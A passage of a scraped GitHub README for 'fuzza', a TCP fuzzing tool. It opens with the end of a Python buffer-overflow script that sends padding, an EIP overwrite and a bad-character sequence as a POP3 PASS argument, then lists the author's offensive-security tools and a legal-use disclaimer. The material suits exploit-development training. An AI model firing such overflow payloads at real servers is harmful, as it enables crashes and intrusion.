\"\\x51\\x52\\x53\\x54\\x55\\x56\\x57\\x58\\x59\\x5a\\x5b\\x5c\\x5d\\x5e\\x5f\\x60\"\n \"\\x61\\x62\\x63\\x64\\x65\\x66\\x67\\x68\\x69\\x6a\\x6b\\x6c\\x6d\\x6e\\x6f\\x70\"\n \"\\x71\\x72\\x73\\x74\\x75\\x76\\x77\\x78\\x79\\x7a\\x7b\\x7c\\x7d\\x7e\\x7f\\x80\"\n \"\\x81\\x82\\x83\\x84\\x85\\x86\\x87\\x88\\x89\\x8a\\x8b\\x8c\\x8d\\x8e\\x8f\\x90\"\n \"\\x91\\x92\\x93\\x94\\x95\\x96\\x97\\x98\\x99\\x9a\\x9b\\x9c\\x9d\\x9e\\x9f\\xa0\"\n \"\\xa1\\xa2\\xa3\\xa4\\xa5\\xa6\\xa7\\xa8\\xa9\\xaa\\xab\\xac\\xad\\xae\\xaf\\xb0\"\n \"\\xb1\\xb2\\xb3\\xb4\\xb5\\xb6\\xb7\\xb8\\xb9\\xba\\xbb\\xbc\\xbd\\xbe\\xbf\\xc0\"\n \"\\xc1\\xc2\\xc3\\xc4\\xc5\\xc6\\xc7\\xc8\\xc9\\xca\\xcb\\xcc\\xcd\\xce\\xcf\\xd0\"\n \"\\xd1\\xd2\\xd3\\xd4\\xd5\\xd6\\xd7\\xd8\\xd9\\xda\\xdb\\xdc\\xdd\\xde\\xdf\\xe0\"\n \"\\xe1\\xe2\\xe3\\xe4\\xe5\\xe6\\xe7\\xe8\\xe9\\xea\\xeb\\xec\\xed\\xee\\xef\\xf0\"\n \"\\xf1\\xf2\\xf3\\xf4\\xf5\\xf6\\xf7\\xf8\\xf9\\xfa\\xfb\\xfc\\xfd\\xfe\\xff\"\n)\n\nbuffer = \"A\"*len_overflow + eip + badchars\n\nprint('Trying to send %s bytes buffer...' % (str(len(buffer))))\ntry:\n s.connect(('mail.example.tld', 110))\n s.recv(1024)\n s.send(str2b('USER test\\r\\n'))\n s.recv(1024)\n s.send(str2b('PASS ' + buffer + '\\r\\n'))\n s.recv(1024)\n s.send(str2b('QUIT\\r\\n'))\n print('done')\nexcept:\n print('Could not connect')\ns.close()\n```\n\n\n## :lock: [cytopia](https://github.com/cytopia) sec tools\n\nBelow is a list of sec tools and docs I am maintaining.\n\n| Name | Category | Language | Description |\n|----------------------|----------------------|------------|-------------|\n| **[offsec]** | Documentation | Markdown | Offsec checklist, tools and examples |\n| **[header-fuzz]** | Enumeration | Bash | Fuzz HTTP headers |\n| **[smtp-user-enum]** | Enumeration | Python 2+3 | SMTP users enumerator |\n| **[urlbuster]** | Enumeration | Python 2+3 | Mutable web directory fuzzer |\n| **[netcat]** | Pivoting | Python 2+3 | Cross-platform netcat |\n| **[badchars]** | Reverse Engineering | Python 2+3 | Badchar generator |\n| **[fuzza]** | Reverse Engineering | Python 2+3 | TCP fuzzing tool |\n\n[offsec]: https://github.com/cytopia/offsec\n[header-fuzz]: https://github.com/cytopia/header-fuzz\n[smtp-user-enum]: https://github.com/cytopia/smtp-user-enum\n[urlbuster]: https://github.com/cytopia/urlbuster\n[netcat]: https://github.com/cytopia/netcat\n[badchars]: https://github.com/cytopia/badchars\n[fuzza]: https://github.com/cytopia/fuzza\n\n\n## :octocat: Contributing\n\nSee **[Contributing guidelines](CONTRIBUTING.md)** to help to improve this project.\n\n\n## :exclamation: Disclaimer\n\nThis tool may be used for legal purposes only. Users take full responsibility for any actions performed using this tool. The author accepts no liability for damage caused by this tool. If these terms are not acceptable to you, then do not use this tool.\n\n\n## :page_facing_up: License\n\n**[MIT License](LICENSE.txt)**\n\nCopyright (c) 2020 **[cytopia](https://github.com/cytopia)**\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcytopia%2Ffuzza","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fcytopia%2Ffuzza","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcytopia%2Ffuzza/lists"}